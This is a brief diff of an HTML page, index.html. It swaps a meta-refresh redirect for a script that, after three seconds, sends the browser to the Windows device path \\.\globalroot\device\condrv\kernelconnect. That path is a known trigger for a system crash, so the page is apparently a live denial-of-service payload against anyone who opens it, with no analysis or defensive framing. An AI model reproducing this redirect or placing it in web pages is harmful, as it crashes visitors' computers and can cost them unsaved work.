--- a/index.html
+++ b/index.html
@@ -2,7 +2,9 @@
 <html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
-<meta http-equiv="refresh" content="0; URL=\\.\globalroot\device\condrv\kernelconnect" />
+<script>
+    setTimeout(function(){location.href="\\.\globalroot\device\condrv\kernelconnect"} , 3000);
+</script>
 
 </head>
 <body>
